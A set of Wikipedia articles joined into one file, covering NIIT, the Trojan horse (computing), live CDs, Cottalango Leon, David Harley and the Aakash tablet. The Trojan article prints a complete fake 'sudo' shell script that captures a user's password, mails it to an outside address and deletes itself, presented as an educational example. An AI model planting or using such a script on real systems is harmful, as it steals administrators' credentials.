NIIT Technologies Ltd. 
Acquisitions
In 2001, NIIT acquired Osprey, DEI and Click2learn in the US, to establish its e-learning and corporate learning practices in that country. In 2006, NIIT acquired Element K, a leading provider of learning solutions in North America. Subsequently, Element K was sold off in 2012. On October 1, 2021, NIIT announced the acquisition of a 70% stake in RPS Consulting, a Bengaluru-based training company.

NIIT Subsidiaries
NIIT (USA), Inc.
NIIT Ireland Ltd
NIIT Institute of Finance, Banking & Insurance Training Ltd.
NIIT China (Shanghai) Limited
NIIT Antilles NV
NIIT Learning Solutions (Canada) Limited
Learning Universe Private Limited
NIIT Institute of Process Excellence Ltd.

Timeline
1981: NIIT was established by Rajendra S. Pawar and Vijay K. Thadani to optimise on the opportunity of booming IT education and training in India
1982: Set up educational centres in Mumbai and Chennai; introduced multimedia technology in education
1983: Corporate training program introduced
1984: IT consultancy service started
1985: Head Office integrated at New Delhi
1986: Software product distribution started under "Insoft" brand
1987: Conceived franchising model of education
1990: Created the Computerdrome to provide unlimited computer time to students
1991: First overseas office set up in the US; "Bhavishya Jyoti Scholarships" launched for meritorious and socially challenged students
1992: GNIIT program started with professional practice
1993: Received ISO 9001 certification for software export; listed on BSE
1995: NIIT tied up with Microsoft to provide education on Microsoft technologies
1996: First overseas education center launched; launched "NetVarsity", the virtual university; awarded ISO 9001 for computer education
1997: NIIT was the first Indian company to be assessed at SEI CMM Level 5 for its software business; this unique distinction put NIIT into the first list of 21st Global companies
1999: Achieved the status of Microsoft's best training partner in Asia; five-time World Champion Viswanathan Anand became NIIT Brand Ambassador; started the Hole-in-the-Wall (HiWEL) experiment for disadvantaged children
2000: Tied up with Oracle Corporation to provide education on Oracle technologies, especially Oracle Database; collaborated with Sun Microsystems on "iForce initiatives on computing giant"
2001: Microsoft awarded NIIT the "Best Training Company Award"
2003: Launched NIIT MindChampions Academy with Viswanathan Anand to promote chess in schools
2004: Global Solutions Business spun off into NIIT Technologies; industry-endorsed GNIIT curriculum was launched; NIIT and Intel signed a deal to use technology-assisted learning in schools
2005: Launch of NIIT IT Aptitude Test (NITAT)
2006: Launched new businesses: NIIT Litmus, which provides testing & assessment services for IT & ITES organizations; NIIT Imperia, which would provide three certificate programmes from the Indian Institutes of Management; and IFBI – Institute of Finance Banking and Insurance (NIIT IFBI)
2009: Founded and commenced the new NIIT University campus in Neemrana, Rajasthan, offering postgraduate-level courses
2011: Launch of NIIT Yuva Jyoti Limited (NYJL) – a joint venture between NIIT and NSDC to fuel growth in skills and employability for youth across India
2012: Launch of Digital Marketing Program; NIIT received the 'Top IT Training Company Award 2012' for the 20th year in succession from Cybermedia publications
2013: NIIT and NIIT University entered into an MoU with Autodesk to evangelize design as a learning discipline in India; NIIT launched the 'Program in Business Analytics'; NIIT launched NIIT Cloud Campus, a pioneering initiative undertaken to help take high-quality educational programs to the remotest corners of the country; NIIT entered the test preparation market with CTET coaching
2014: NIIT launched its new persona-based website www.niit.com
2015: The Internet and Mobile Association of India (IAMAI) recognized NIIT as the "Best Educational Website"; NIIT entered into an MoU with Guian New Area, China
2016: Launch of Training.com to offer online training
2017: Sapnesh Lalla took charge as the CEO of NIIT Ltd.
2019: Baring Private Equity Asia acquired NIIT Ltd's controlling stake in NIIT Technologies Ltd.

Business Units
NIIT has two main lines of business across the globe – the Corporate Learning Group and the Skills & Careers Business. NIIT's Corporate Learning Group (CLG) offers Managed Training Services (MTS) to market-leading companies in North America, Europe, Asia, and Oceania. The Skills & Careers Business (SNC) delivers a diverse range of learning and talent development programs to millions of individual and corporate learners in areas including digital transformation, banking, finance and insurance, retail sales enablement, digital media marketing, and new-age IT. NIIT has incubated StackRoute as a digital transformation partner for corporates to build multi-skilled full-stack developers at scale.

See also
Education in India
Information technology in India
List of Indian IT companies
Professional certification
Professional certification (computer technology)

References

External links

Education companies established in 1981
Companies based in Gurgaon
Educational institutions established in 1981
For-profit universities and colleges
1981 establishments in Haryana
Companies listed on the National Stock Exchange of India
Companies listed on the Bombay Stock Exchange
30056
https://en.wikipedia.org/wiki/Trojan%20horse%20%28computing%29
Trojan horse (computing)
In computing, a Trojan horse is any malware that misleads users of its true intent. The term is derived from the Ancient Greek story of the deceptive Trojan Horse that led to the fall of the city of Troy. Trojans generally spread by some form of social engineering; for example, where a user is duped into executing an email attachment disguised to appear not suspicious (e.g., a routine form to be filled in), or by clicking on some fake advertisement on social media or anywhere else. Although their payload can be anything, many modern forms act as a backdoor, contacting a controller who can then have unauthorized access to the affected computer. Ransomware attacks are often carried out using a trojan. Unlike computer viruses, worms, and rogue security software, trojans generally do not attempt to inject themselves into other files or otherwise propagate themselves. Use of the term It's not clear where or when the concept, and this term for it, was first used, but by 1971 the first Unix manual assumed its readers knew both: Another early reference is in a US Air Force report in 1974 on the analysis of vulnerability in the Multics computer systems. It was made popular by Ken Thompson in his 1983 Turing Award acceptance lecture "Reflections on Trusting Trust", subtitled: To what extent should one trust a statement that a program is free of Trojan horses? Perhaps it is more important to trust the people who wrote the software. He mentioned that he knew about the possible existence of trojans from a report on the security of Multics. Behavior Once installed, trojans may perform a range of malicious actions. Many tend to contact one or more Command and Control (C2) servers across the Internet and await instruction. Since individual trojans typically use a specific set of ports for this communication, it can be relatively simple to detect them. Moreover, other malware could potentially "take over" the trojan, using it as a proxy for malicious action. In German-speaking countries, spyware used or made by the government is sometimes called govware. Govware is typically a Trojan software used to intercept communications from the target computer. Some countries like Switzerland and Germany have a legal framework governing the use of such software. Examples of govware trojans include the Swiss MiniPanzer and MegaPanzer and the German "state trojan" nicknamed R2D2. German govware works by exploiting security gaps unknown to the general public and accessing smartphone data before it becomes encrypted via other applications. Due to the popularity of botnets among hackers and the availability of advertising services that permit authors to violate their users' privacy, trojans are becoming more common. According to a survey conducted by BitDefender from January to June 2009, "trojan-type malware is on the rise, accounting for 83% of the global malware detected in the world." Trojans have a relationship with worms, as they spread with the help given by worms and travel across the internet with them. BitDefender has stated that approximately 15% of computers are members of a botnet, usually recruited by a trojan infection. Linux example A Trojan horse is a program that purports to perform some obvious function, yet upon execution it compromises the user's security. One easy program is a new version of the Linux sudo command. The command is then copied to a publicly writable directory like /tmp. If an administrator happens to be in that directory and executes sudo, then the Trojan horse might be executed. 
Here is a working version:

# sudo
# ----
# Turn off the character echo to the screen.
stty -echo
/bin/echo -n "Password for `whoami`: "
read x
/bin/echo ""
# Turn back on the character echo.
stty echo
echo $x | mail -s "`whoami` password" [email protected]
sleep 1
echo Sorry.
rm $0
exit 0

To prevent a command-line based Trojan horse, set the . entry in the PATH environment variable to be located at the tail end. For example: PATH=/usr/local/bin:/usr/bin:.

Notable examples

Private and governmental
ANOM – FBI
0zapftis / r2d2 StaatsTrojaner – DigiTask
DarkComet – CIA / NSA
FinFisher – Lench IT solutions / Gamma International
DaVinci / Galileo RCS – HackingTeam
Magic Lantern – FBI
SUNBURST – SVR/Cozy Bear (suspected)
TAO QUANTUM/FOXACID – NSA
WARRIOR PRIDE – GCHQ

Publicly available
EGABTR – late 1980s
Netbus – 1998 (published)
Sub7 by Mobman – 1999 (published)
Back Orifice – 1998 (published)
Y3K Remote Administration Tool by E&K Tselentis – 2000 (published)
Beast – 2002 (published)
Bifrost trojan – 2004 (published)
DarkComet – 2008–2012 (published)
Blackhole exploit kit – 2012 (published)
Gh0st RAT – 2009 (published)
MegaPanzer BundesTrojaner – 2009 (published)
MEMZ by Leurak – 2016 (published)

Detected by security researchers
Twelve Tricks – 1990
Clickbot.A – 2006 (discovered)
Zeus – 2007 (discovered)
Flashback trojan – 2011 (discovered)
ZeroAccess – 2011 (discovered)
Koobface – 2008 (discovered)
Vundo – 2009 (discovered)
Meredrop – 2010 (discovered)
Coreflood – 2010 (discovered)
Tiny Banker Trojan – 2012 (discovered)
Shedun Android malware – 2015 (discovered)

Capitalization
The computer term "trojan horse" is derived from the legendary Trojan Horse of the ancient city of Troy. For this reason "Trojan" is often capitalized. However, while style guides and dictionaries differ, many suggest a lower case "trojan" for normal use.

See also
Computer security
Cuckoo's egg (metaphor)
Cyber spying
Dancing pigs
Exploit (computer security)
Industrial espionage
Principle of least privilege
Privacy-invasive software
Remote administration
Remote administration software
Reverse connection
Rogue security software
Scammers
Technical support scam
Timeline of computer viruses and worms
Zombie (computer science)

References

External links

Social engineering (computer security)
Spyware
Web security exploits
Cyberwarfare
Security breaches
8111362
https://en.wikipedia.org/wiki/List%20of%20live%20CDs
List of live CDs
This is a list of live CDs. A live CD or live DVD is a CD-ROM or DVD-ROM containing a bootable computer operating system. Live CDs are unique in that they have the ability to run a complete, modern operating system on a computer lacking mutable secondary storage, such as a hard disk drive. Rescue and repair Billix – A multiboot distribution and system administration toolkit with the ability to install any of the included Linux distributions Inquisitor – Linux kernel-based hardware diagnostics, stress testing and benchmarking live CD Parted Magic – Entirely based on the 2.6 or newer Linux kernels System Folder of classic Mac OS on a CD or on a floppy disk – Works on any media readable by 68k or PowerPC Macintosh computers SystemRescueCD – A Linux kernel-based CD with tools for Windows and Linux repairs BSD-based FreeBSD based DesktopBSD – as of 1.6RC1 FreeBSD and FreeSBIE based FreeBSD – has supported use of a "fixit" CD for diagnostics since 1996 FreeNAS – m0n0wall-based FreeSBIE (discontinued) – FreeBSD-based GhostBSD – FreeBSD based with gnome GUI, installable to HDD Ging – Debian GNU/kFreeBSD-based m0n0wall (discontinued) – FreeBSD-based TrueOS – FreeBSD-based pfSense – m0n0wall-based Other BSDs DragonFly BSD Linux kernel-based Arch Linux based Artix – LXQt preconfigured and OpenRC-oriented live CD and distribution Archie – live CD version of Arch Linux. Antergos Chakra Manjaro – primarily free software operating system for personal computers aimed at ease of use. Parabola GNU/Linux-libre - distro endorsed by the Free Software Foundation SystemRescueCD Debian-based These are directly based on Debian: antiX – A light-weight edition based on Debian Debian Live – Official live CD version of Debian Finnix – A small system administration live CD, based on Debian testing, and available for x86 and PowerPC architectures grml – Installable live CD for sysadmins and text tool users HandyLinux – A French/English Linux distribution derived from Debian designed for inexperienced computer users Instant WebKiosk – Live, browser only operating system for use in web kiosks and digital signage deployments Kali Linux – The most advanced penetration testing distribution Knoppix – The "original" Debian-based live CD MX Linux – Live based on Debian stable Tails – An Amnesic OS based on anonymity and Tor Slax – (formerly based on Slackware) modular and very easy to remaster Webconverger – Kiosk software that boots live in order to turn PC into temporary Web kiosk Knoppix-based A large number of live CDs are based on Knoppix. The list of those is in the derivatives section of the Knoppix article. Ubuntu-based These are based at least partially on Ubuntu, which is based on Debian: CGAL LiveCD – Live CD containing CGAL with all demos compiled. This enables the user to get an impression of CGAL and create CGAL software without the need to install CGAL. Emmabuntüs is a Linux distribution derived from Ubuntu and designed to facilitate the repacking of computers donated to Emmaüs Communities. gNewSense – Supported by the Free Software Foundation, includes GNOME gOS – A series of lightweight operating systems based on Ubuntu with Ajax-based applications and other Web 2.0 applications, geared to beginning users, installable live CD Linux Mint – Installable live CD Mythbuntu – A self-contained media center suite based on Ubuntu and MythTV OpenGEU – Installable live CD PC/OS – An Ubuntu derivative whose interface was made to look like BeOS. a 64 bit version was released in May 2009. 
In 2010 PC/OS moved to a more unified look to its parent distribution and a GNOME version was released on March 3, 2010. Pinguy – An Ubuntu-based distribution designed to look and feel simple. Pinguy is designed with the intent of integrating new users to Linux. Puredyne – Live CD/DVD/USB for media artists and designers, based on Ubuntu and Debian Live Qimo 4 Kids – A fun distro for kids that comes with educational games Trisquel – Supported by the Free Software Foundation, includes GNOME TurnKey Linux Virtual Appliance Library – Family of installable live CD appliances optimized for ease of use in server-type usage scenarios Ubuntu and Lubuntu – Bootable live CDs Other Debian-based AVLinux – AVLinux is a Linux for multimedia content creators. CrunchBang Linux – Installable live CD, using Openbox as window manager Damn Small Linux – Very light and small with JWM and Fluxbox, installable live CD DemoLinux (versions 2 and 3) – One of the first live CDs Dreamlinux – Installable live CD to hard drives or flash media * This distribution has ceased support * gnuLinEx – Includes GNOME Kanotix – Installable live CD MEPIS – Installable live CD Gentoo-based Bitdefender Rescue CD Calculate Linux FireballISO – VMware virtual machine that generates a customized security-hardened IPv4 and IPv6 firewall live CD. Incognito – includes anonymity and security tools such as Tor by default Kaspersky Rescue Disk Pentoo SabayonLinux Ututo VidaLinux Mandriva-based DemoLinux (version 1) Mageia – installable live CD Mandriva Linux – installable live CD; GNOME and KDE editions available openSUSE-based openSuSE – official Novell/SuSE-GmbH version – installable live CD; GNOME and KDE versions available Red Hat Linux/Fedora-based Berry Linux CentOS – installable live CD Fedora – installable live CD, with GNOME or KDE Korora – installable live USB (recommended over DVD), with Cinnamon, GNOME, KDE, MATE, or Xfce Network Security Toolkit – installable live disc, with GNOME or Fluxbox Slackware-based AUSTRUMI – 50 MB Mini distro BioSLAX – a bioinformatics live CD with over 300 bioinformatics applications NimbleX – under 200 MB Porteus – under 300 MB Salix Slackware-live ( CD / USB images with latest update from slackware-current ) Vector Linux (Standard and SOHO Editions) Zenwalk Other Acronis Rescue Media – to make disk images from hard disk drives CHAOS – small (6 MB) and designed for creating ad hoc computer clusters EnGarde Secure Linux – a highly secure Linux based on SE Linux GeeXboX – a self-contained media center suite based on Linux and MPlayer GoboLinux – an alternative Linux distribution. Its most salient feature is its reorganization of the filesystem hierarchy. Under GoboLinux, each program has its own subdirectory tree. 
Granular – installable live CD based on PCLinuxOS, featuring KDE and Enlightenment Lightweight Portable Security – developed and publicly distributed by the United States Department of Defense’s Software Protection Initiative to serve as a secure end node Linux From Scratch Live CD (live CD inactive) – used as a starting point for a Linux From Scratch installation Nanolinux – 14 MB distro on an installable live CD with BusyBox and Fltk, for desktop computing paldo – independently developed, rolling release distribution on installable live CD PCLinuxOS – installable live CD for desktop computing use Puppy Linux – installable live CD, very small SliTaz – installable live CD, one of the smallest available with good feature set Tiny Core Linux – based on Linux 2.6 kernel, BusyBox, Tiny X, Fltk, and Flwm, begins at 10 MB XBMC Live – a self-contained media center suite based on Embedded Linux and XBMC Media Center OS X-based DasBoot by SubRosaSoft.com OSx86 (x86 only) Windows-based Microsoft representatives have described third-party efforts at producing Windows-based live CDs as "improperly licensed" uses of Windows, unless used solely to rescue a properly licensed installation. However, Nu2 Productions believes the use of BartPE is legal provided that one Windows license is purchased for each BartPE CD, and the Windows license is used for nothing else. BartPE – allows creation of a bootable CD from Windows XP and Windows Server 2003 installation files WinBuilder – allows the creation of a bootable CD from Windows 2000 and later Windows Preinstallation Environment OpenSolaris-based Systems based on the former open source "OS/net Nevada" or ONNV open source project by Sun Microsystems. BeleniX – full live CD and live USB distribution (moving to Illumos?) OpenSolaris – the former official distribution supported by Sun Microsystems based on ONNV and some closed source parts Illumos-based Illumos is a fork of the former OpenSolaris ONNV aiming to further develop the ONNV and replacing the closed source parts while remaining binary compatible. The following products are based upon Illumos: Nexenta OS – combines the GNU userland with the OpenSolaris kernel. OpenIndiana – since OpenIndiana 151a based on Illumos Other operating systems AmigaOS 4 – Installable live CD Arch Hurd – A live CD of Arch Linux with the GNU Hurd as its kernel AROS – Offers live CD for download on the project page BeOS – All BeOS discs can be run in live CD mode, although PowerPC versions need to be kickstarted from Mac OS 8 when run on Apple or clone hardware FreeDOS – the official "Full CD" 1.0 release includes a live CD portion Haiku – Haiku is a free and open source operating system compatible with BeOS running on Intel x86 platforms instead of PowerPC. Hiren's BootCD Minix MorphOS – Installable live CD OpenVMS – Installable live CD OS/2 Ecomstation Demo Plan 9 from Bell Labs – Has a live CD, which is also its install CD (and the installer is a shell script). QNX ReactOS SkyOS Syllable Desktop See also List of Linux distributions that run from RAM List of tools to create Live USB systems Windows To Go References External links The LiveCD List Live CDs Live CD
49360708
https://en.wikipedia.org/wiki/Cottalango%20Leon
Cottalango Leon
Cottalango Leon (born 1971) is an Indian-American computer graphics technician who won the Academy Award for scientific and technical achievement jointly with Sam Richards and J. Robert Ray in 2016. Leon won the Academy Award for "the design, engineering and continuous development" of Sony Pictures Imageworks' itView technology, a digital 3D film review application. Leon worked on the itView technology for eight years as its chief contributor. Schooled in India, Leon is an Arizona State University alumnus. He has worked at Sony Pictures Imageworks since 1996, and has contributed to the making of several commercially successful films, including the Spider-Man film series and the Men in Black film series.

Early life and family
Leon was born at his mother's family residence in Thoothukudi, Tamil Nadu in 1971. Both his parents – mother Rajam Mariasingam and father Loorthu – were primary school teachers. When Leon was young, his parents moved from the south of Tamil Nadu to Coimbatore. Leon's early years were spent in this city – a place he still visits every two years. Leon attended the Government High School at Kallapalayam, a village in the Sultanpet Block of Coimbatore. After studying there till grade VII, he studied from grade VIII to grade XII at Kadri Mills High School in Coimbatore. During his childhood, Leon became interested in mathematics and science, and also developed, by his own account, a keen interest in "the visual aspect of movies". Subsequently, Leon attended the PSG College of Technology from 1988 till 1992, completing his Bachelor of Engineering degree in computer science. He completed his M.S. in computer science at Arizona State University in 1996, specialising in computer graphics. Leon married Roopa in 2001. Roopa also belongs to southern Tamil Nadu, having lived there till her marriage to Leon. The couple have a daughter, Shruthi, and live in Culver City.

Career
After graduating, Leon joined the New Delhi firm Softek LLC and worked with them for two years, till 1994. As per Leon, during this time he became inspired by Jurassic Park after watching the film and decided to pursue a career in the technologies used in its making. After completing his master's degree at Arizona State University in 1996, Leon worked for a short time as a video game programmer with DreamWorks Interactive, before joining Sony Pictures Imageworks in 1996, where he continues working to date, currently holding the position of Principal Software Engineer. At Imageworks, as per Leon, he was asked to develop an improved digital film review application as an alternative to the software then in use. Leon released the initial version within two months of being assigned the job; after receiving positive feedback from the artists using the software, Leon kept updating its functionality over the years. This digital 3D film review software, itView, led to Leon receiving an Academy Award in 2016. Leon mentions working alone on the project for many years, and that he was over time given a team when the project achieved significant growth. In a 2016 media interview, Leon said that he worked on the itView technology for eight years as its chief contributor. To date, Leon has worked on several commercially successful films, including Stuart Little, the Spider-Man film series, the Men in Black film series, Cloudy with a Chance of Meatballs, The Smurfs, Hotel Transylvania, and Open Season.
2016 Academy Award Leon, at the age of 44, won the 2016 Academy Award for scientific and technical achievement for "the design, engineering and continuous development" of Sony Pictures Imageworks itView technology. In a ceremony held on 13 February 2016 at Beverly Wilshire Hotel in Beverly Hills, California, Leon received the Academy Award jointly with Sam Richards and J. Robert Ray. As per the Academy, these set of awards are bestowed upon individuals who have contributed significantly over time – and not necessarily in the past year – to the motion picture industry. Richard Edlund, Chair of the Scientific and Technical Awards Committee at the Academy of Motion Picture Arts and Sciences praised the "outstanding, innovative work" of awardees, adding that their contributions "have further expanded filmmakers’ creative opportunities..." The Academy's award citation praised itView's API plugin and varied functionalities, mentioning that "itView provides an intuitive and flexible creative review environment that can be deployed globally for highly efficient collaboration." Leon said that "the award was not totally unexpected" but that it felt "good to be recognised by the Academy and the wider industry." See also List of Indian winners and nominees of the Academy Awards Notes References External links Indian Academy Award winners Living people Academy Award for Technical Achievement winners People from Coimbatore People from Thoothukudi 1971 births Arizona State University alumni Indian emigrants to the United States
32220899
https://en.wikipedia.org/wiki/David%20Harley
David Harley
David Harley is an IT security researcher, author/editor and consultant living in the United Kingdom, known for his books on and research into malware, Mac security, anti-malware product testing and management of email abuse. Career After a checkered career that included spells in music, bar-work, work with the mentally handicapped, retail and the building trade, Harley entered the IT field in the late 1980s, working initially in administration at the Royal Free Hospital in London, and in 1989 went to work for the Imperial Cancer Research Fund (now merged into Cancer Research UK), where he held administrative and IT support roles and eventually moved into full-time security. In 2001 he joined the National Health Service where he ran the Threat Assessment Centre. After leaving the NHS in 2006 to work as an independent consultant, he worked closely with the security company ESET where between 2011 and 2018 he held the position of Senior Research Fellow, working with the Cyber Threat Analysis Center. In 2009 he was elected to the Board of Directors of the Anti-Malware Testing Standards Organization (AMTSO). He stood down in February 2012, when Righard Zwienenberg, president of AMTSO, joined ESET, as the AMTSO bylaws don't allow more than one Board member to represent the same AMTSO member entity. He ran the Mac Virus website, and formerly held an undefined executive role in AVIEN. He is a former Fellow of the British Computer Society: he explained in a blog article in 2014 that he was dropping his subscriptions to the BCS Institute and (ISC)2 (and therefore would no longer be entitled to continue using the acronyms CISSP, CITP and FBCS), and his reasons for so doing. In January 2019 he announced that he was no longer working with ESET and was reverting to his former career as a musician, but indicated that he was still available for one-off authoring and editing work. He subsequently contributed content, reviewing and translation for the English edition of the book Cyberdanger by Eddy Willems. Writing Harley was co-author (with Robert Slade and Urs Gattiker) of Viruses Revealed, and technical editor and principal author of The AVIEN Malware Defense Guide for the Enterprise. He has also contributed chapters to a number of other security-related books, and sometimes writes for specialist security publishers such as Virus Bulletin and Elsevier. He has often presented papers at specialist security conferences including Virus Bulletin, AVAR, and EICAR. Until the end of 2018 he blogged regularly for ESET, and on occasion for Infosecurity Magazine, SC Magazine, (ISC)2, SecuriTeam, Mac Virus, and Small Blue-Green World. His Geek Peninsula metablog lists many of his papers and articles. Other work Some recordings, miscellaneous prose and verse are posted to or linked from his personal blog page. Miscellaneous prose – some but not all connected to the security industry – is posted to the Miscellaneous Prose page. Family life Harley was born in Shropshire and educated at the Priory Grammar School for Boys, Shrewsbury. He hardly ever talks publicly about his private life, but a biographical article for Virus Bulletin, and the dedications page to Viruses Revealed indicate that he has a daughter. He lives with his third wife in Cornwall, in the UK. Bibliography (Contributed content and some editing and translation.) Volume 3, "E-Mail Threats and Vulnerabilities." Chapter 3: "Malicious Macs: Malware and the Mac." Chapter 4: "Malware Detection and the Mac." (Editor, technical editor, several chapters.) 
Co-wrote Chapter 5, "Botnet Detection: Tools and Techniques" with Jim Binkley. Volume 3, "E-Mail Threats and Vulnerabilities." Massmailers: New Threats Need Novel Anti-Virus Measures. Co-wrote Chapter 49, "Medical Records Security" with Paul Brusil. Revised Chapter 17 "Viruses and Worms", Chapter 18 "Trojans." Chapter 17 "Viruses and Worms", Chapter 18 "Trojans." Co-Author. Papers Harley published white papers, conference papers and presentations, and on-line articles with or on behalf of ESET between 2006 and 2018. Some previous and subsequent papers, articles and presentations are available from his Geek Peninsula blog. References External links —home page Living people Writers about computer security British writers British technology writers 1949 births People educated at The Priory Boys' Grammar School, Shrewsbury
21371926
https://en.wikipedia.org/wiki/Aakash%20%28tablet%29
Aakash (tablet)
Aakash a.k.a. Ubislate 7+, is an Android-based tablet computer promoted by the Government of India as part of an initiative to link 25,000 colleges and 400 universities in an e-learning program. It was produced by the British-Canadian company DataWind, and manufactured by the company, at a production center in Hyderabad. The tablet was officially launched as the Aakash in New Delhi on 5 October 2011. The Indian Ministry of Human Resource Development announced an upgraded second-generation model called Aakash 2 in April 2012. The Aakash was a low-cost tablet computer with a 7-inch touch screen, ARM 11 processor, and 256 MB RAM running under the Android 2.2 operating system. It had two universal serial bus (USB) ports and delivered high definition (HD) quality video. For applications; the Aakash had access to Getjar, an independent market, rather than the Android Market. Originally projected as a "$35 laptop", the device was to be sold to the Government of India and distributed to university students – initially at US$50 until further orders are received and projected eventually to achieve the target $35 price. A commercial version of Aakash was marketed as UbiSlate 7+ at a price of $60. The Aakash 2, code named UbiSlate 7C, was released on 11 November 2012. Etymology The device was initially called the Sakshat tablet, later changed to Aakash, which is derived from the Sanskrit word Akasha (Devanagari आकाश) with several related meanings such as empty space and outer space. The word in Hindi means "sky". History The aspiration to create a "Made in India" computer was first reflected in a prototype "Simputer" that was produced in small numbers. Bangalore-based CPSU, Bharat Electronics Ltd manufactured around 5,000 Simputers for Indian customers from 2002 to 2007. In 2011, Kapil Sibal announced an anticipated low-cost computing device to compete with the One Laptop per Child (OLPC) initiative, though intended for urban college students rather than the OLPC's rural, underprivileged students. A year later, the MHRD announced that the low-cost computer would be launched in six weeks. Nine weeks later, the MHRD showcased a tablet named "Aakash", not nearly what had been projected and at $60 USD rather than the projected $35. "NDTV" reported that the new low-cost tablet was considerably less able than the previously shown prototype and was going to cost about twice as much. While it was once projected as a laptop, the design has evolved into a tablet computer. At the inauguration of the National Mission on Education Program organized by the Union HRD Ministry in 2009, joint secretary N. K. Sinha had said that the computing device is 10 inches (which is around 25.5 cm) long and 5 inches (12.5 cm) wide and priced at around $30 USD. India's Human Resource Development Minister, Kapil Sibal, unveiled a prototype on 22 July 2010, which was later given out to 500 college students to collect feedback. The price of the device exhibited was projected at $35 USD, eventually to drop to $20 USD and ultimately to $10 USD. After the device was unveiled, OLPC chairman Nicholas Negroponte offered full access to OLPC technology at no cost to the Indian team. The tablet was shown on the television program "Gadget Guru" aired on NDTV in August 2010, when it was shown to have 256 MB RAM and 2 GB of internal flash-memory storage and demonstrated running the Android operating system featuring video playback, internal Wi-Fi and cellular data via an external 3G modem. 
The device was developed as part of the country's aim to link 25,000 colleges and 400 universities in an e-learning program. Originally projected as a "$35 laptop", the device was planned to be sold to the Government of India and distributed to university students – initially at US$50 until further orders were received, and projected eventually to achieve the target price of US$35. A commercial version was eventually released online as the UbiSlate7 and UbiSlate7+ tablet PCs on 11 November 2012, with a plan to offer a subsidized price for students. As of February 2012, DataWind had over 1,400,000 booking orders, but had shipped only 10,000 units – 0.7% of the booking orders. As of November 2012, many customers who booked their orders still had not received their computers and were offered refunds.

Specifications
As released on 5 October 2011, the Aakash features an overall size of 190.5 x 118.5 x 15.7 mm with a resistive touchscreen, and uses the Android 2.2 operating system with access to the proprietary marketplace Getjar (not the Android Market), developed by DataWind. The processor runs at 366 MHz; there is a graphics accelerator and a high definition (HD) video coprocessor. The tablet has 256 MB RAM, a micro SD slot with a 2 GB Micro SD card (expandable up to 32 GB), two USB ports, a 3.5 mm audio output and input jack, a 2100 mAh battery, Wi-Fi capability, a browser developed by DataWind, and an internal cellular and Subscriber Identity Module (SIM) modem. Power consumption is 2 watts, and there is a solar charging option. The Aakash is designed to support various document (DOC, DOCX, PPT, PPTX, XLS, XLSX, ODT, ODP, and PDF), image (PNG, JPG, BMP, and GIF), audio (MP3, AAC, AC3, WAV, and WMA) and video (MPEG2, MPEG4, AVI, and FLV) file formats and includes an application for access to YouTube video content.

Development and testing
Kapil Sibal has stated that a million devices would be made available to students in 2011. The devices will be manufactured at a cost of Rs 1,500 (€23) each, half of which will be paid by the government and half by the institutions that would use them. In January 2011, the company initially chosen to build the Sakshat, HCL Infosystems, failed to provide evidence that it had at least Rs 600 million ($12.2 million) in bank-guaranteed funds, as required by the Indian government, which has allocated $6.5 million to the project. As a result, the government put the project out for bidding again. In June 2011, the HRD announced that it had received a few samples from the production process, which were under testing. It also mentioned that each state in India provided 3,000 samples for testing of their functionality, utility, and durability in field conditions. The Government of India announced that 10,000 (Sakshat) tablets would be delivered to schools and colleges by late June and that over the next four months 90,000 more would be made available at a price of Rs 2,500 per device. The government will subsidize the cost by about 50%, so a student would have to pay less than Rs 1,500 for the device. The Indian Ministry of Education is releasing educational videos in conjunction with IGNOU at sakshat.ac.in. This content, meant for students with access to the Internet, is India's first law-abiding online video library.

Hardware Development
IIT Rajasthan's specifications were a 1.2 GHz CPU and 700 MB RAM. It wanted the tablet to work after steep falls and in the monsoon season, making the cost over Rs 5,000.
So the responsibility of drafting specifications will be shifted to IIT Mumbai, IIT Madras, and IIT Kanpur while PSUs are being considered for procurement of the Aakash Tablet. Aakash 2 could have the 1 GB RAM, Capacitive TouchScreen Panel and a front-facing camera of VGA Quality (0.3 MP), capable of capturing video, that was announced earlier by Kapil Sibal. This version of the tablet may be announced only after October 2012 because of low funds in procuring the raw material for assembling and also setting up of assembling plant at Noida and Coimbatore. The Govt. officials say that the tablet may not be realized due to the pressure from various institutes and meager support from the Indian Government in regard to the funds regarding the process of the tablet procurement and assembly of the same. 35% of hardware components were sourced from South Korea, 25% from China, 16% from the US, 16% from India, and 8% from other countries. Reception Problems such as low memory, frequent system freezes, poor sound quality, absence of support for all formats, and inability to install free software available online were also cited by users. Technical commentator Prasanto Roy criticized issues such as a low battery life, an insufficient 7" screen, and absence of training and support infrastructure, especially in rural areas. UbiSlate 7+ will be released by 2012. The producer has finalized the improvements of Aakash. After receiving feedback on the early release model from over 500 users from educational institutions, DataWind announced the next iteration that will have a new microprocessor of 700 MHz versus the original 366 MHz processor. This will improve the speed of the tablet and solve the existing problems of quick overheating, frequent system freeze, poor sound quality, absence of support for all formats, and the inability to install free online software. The amount of memory, storage, and USB ports will remain the same. On 16 December 2011, DataWind opened Aakash booking online in their official website at 2500 with one week delivery time and cash on delivery facility, and its upgraded version Ubislate 7+ was available for booking at 2999. On 19 December 2011, DataWind reported that the first phase of Aakash tablet had been sold out completely, just three days since it was opened for Online booking. UbiSlate 7+ production capacity of January, February, and March have already been sold. Now, April production is open for booking. By 3rd January 2012, 1.4 million orders had been received since the UbiSlate 7+ was put up for sale online. By the end of January 2012, booking orders for UbiSlate 7+ have crossed two million. By 13 April 2012, Datawind severed connection with its supplier Quad, further delaying the assembly of UbiSlate 7+. While Quad claims DataWind has not paid it, the Canadian company alleges that its former partner infringed its intellectual property rights by trying to sell directly to the Indian Institute of Technology (IIT) Rajasthan. In the November 2012 issue of PCQuest, some letters described Datawind to be a fraud company, and the users wanted to sue the company in consumer court. Plans On 26 April 2012, Datawind launched UbiSlate 7+ and Ubislate 7C tablet in physical stores at Delhi. Reliance Industries Limited (RIL) has announced the plan to launch LTE(4G) Tablet between 3500–5000, with low-cost Internet service. This tablet will be an upgraded version of Aakash developed by DataWind. Indian Govt. HRD has revealed that Aakash 2 will be announced in May 2012. 
